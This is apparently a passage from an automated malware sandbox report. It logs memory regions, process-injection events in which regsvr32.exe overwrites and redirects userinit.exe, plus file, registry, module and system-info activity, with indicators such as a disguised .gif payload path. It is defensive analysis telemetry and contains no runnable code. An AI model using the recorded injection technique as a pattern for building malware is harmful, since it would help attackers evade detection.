msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x414, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d770000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Ìó, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7720ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7720b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7720c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7720d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 4132847	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #48: userinit.exe

222

0

»

Information	Value
ID	#48
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:07, Reason: Child Process
Unmonitor	End Time: 00:03:11, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x2a8
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 5A8 0x 81C 0x 864

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00140000	0x00140fff	Memory Mapped File	r	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	rw	-
pagefile_0x0000000000170000	0x00170000	0x00171fff	Pagefile Backed Memory	r	-
private_0x00000000001c0000	0x001c0000	0x001cffff	Private Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x00297fff	Pagefile Backed Memory	r	-
private_0x00000000002d0000	0x002d0000	0x003cffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x0000000000680000	0x00680000	0x0077ffff	Private Memory	rw	-
private_0x0000000000680000	0x00680000	0x006fffff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x0077ffff	Private Memory	rw	-
pagefile_0x0000000000780000	0x00780000	0x0085efff	Pagefile Backed Memory	r	-
private_0x0000000000860000	0x00860000	0x00a0ffff	Private Memory	rw	-
private_0x0000000000860000	0x00860000	0x0096cfff	Private Memory	rw	-
private_0x00000000009d0000	0x009d0000	0x00a0ffff	Private Memory	rw	-
private_0x0000000000a10000	0x00a10000	0x00b0ffff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00b90fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00b94fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00b98fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00b9cfff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00ba2fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00ba6fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00baafff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00baefff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bb4fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bb8fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bbcfff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bc2fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bc6fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bcafff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bcefff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bd4fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bd8fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bdcfff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00be2fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00be6fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00beafff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00beefff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bf4fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bf8fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00bfcfff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c02fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c06fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c0afff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c0efff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c12fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c16fff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c1afff	Private Memory	rw	-
private_0x0000000000b10000	0x00b10000	0x00c1ffff	Private Memory	-	-
private_0x0000000000ba0000	0x00ba0000	0x00c22fff	Private Memory	rw	-
private_0x0000000000ba0000	0x00ba0000	0x00c26fff	Private Memory	rw	-
private_0x0000000000ba0000	0x00ba0000	0x00c2afff	Private Memory	rw	-
private_0x0000000000ba0000	0x00ba0000	0x00c2efff	Private Memory	rw	-
private_0x0000000000bb0000	0x00bb0000	0x00c44fff	Private Memory	rw	-
private_0x0000000000bb0000	0x00bb0000	0x00c48fff	Private Memory	rw	-
private_0x0000000000bb0000	0x00bb0000	0x00c4cfff	Private Memory	rw	-
private_0x0000000000bb0000	0x00bb0000	0x00c50fff	Private Memory	rw	-
private_0x0000000000bc0000	0x00bc0000	0x00c66fff	Private Memory	rw	-
private_0x0000000000bc0000	0x00bc0000	0x00c6afff	Private Memory	rw	-
private_0x0000000000bc0000	0x00bc0000	0x00c6efff	Private Memory	rw	-
private_0x0000000000bd0000	0x00bd0000	0x00c84fff	Private Memory	rw	-
private_0x0000000000bd0000	0x00bd0000	0x00c88fff	Private Memory	rw	-
private_0x0000000000bd0000	0x00bd0000	0x00c8cfff	Private Memory	rw	-
private_0x0000000000bd0000	0x00bd0000	0x00c90fff	Private Memory	rw	-
private_0x0000000000be0000	0x00be0000	0x00ca6fff	Private Memory	rw	-
private_0x0000000000be0000	0x00be0000	0x00caafff	Private Memory	rw	-
private_0x0000000000be0000	0x00be0000	0x00caefff	Private Memory	rw	-
private_0x0000000000bf0000	0x00bf0000	0x00cc4fff	Private Memory	rw	-
private_0x0000000000bf0000	0x00bf0000	0x00cc8fff	Private Memory	rw	-
private_0x0000000000bf0000	0x00bf0000	0x00cccfff	Private Memory	rw	-
private_0x0000000000bf0000	0x00bf0000	0x00cd0fff	Private Memory	rw	-
private_0x0000000000c00000	0x00c00000	0x00ce6fff	Private Memory	rw	-
private_0x0000000000c00000	0x00c00000	0x00ceafff	Private Memory	rw	-
private_0x0000000000c00000	0x00c00000	0x00ceefff	Private Memory	rw	-
private_0x0000000000c30000	0x00c30000	0x00cc0fff	Private Memory	rw	-
userinit.exe	0x00cf0000	0x00cf8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d00000	0x00d00000	0x018fffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01900000	0x0222ffff	Memory Mapped File	r	-
pagefile_0x0000000002230000	0x02230000	0x02622fff	Pagefile Backed Memory	r	-
private_0x0000000002630000	0x02630000	0x0282ffff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028d2fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028e0fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028f2fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02900fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02912fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02920fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02924fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02928fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02934fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02938fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0293cfff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a52fff	Private Memory	rwx	-
private_0x0000000002a60000	0x02a60000	0x02b5ffff	Private Memory	-	-
private_0x0000000002b60000	0x02b60000	0x02b9ffff	Private Memory	rw	-
private_0x0000000002ba0000	0x02ba0000	0x02c9ffff	Private Memory	rw	-
sortdefault.nls	0x02ca0000	0x02f6efff	Memory Mapped File	r	-
comctl32.dll	0x6d720000	0x6d7a3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffdc008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x5a8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
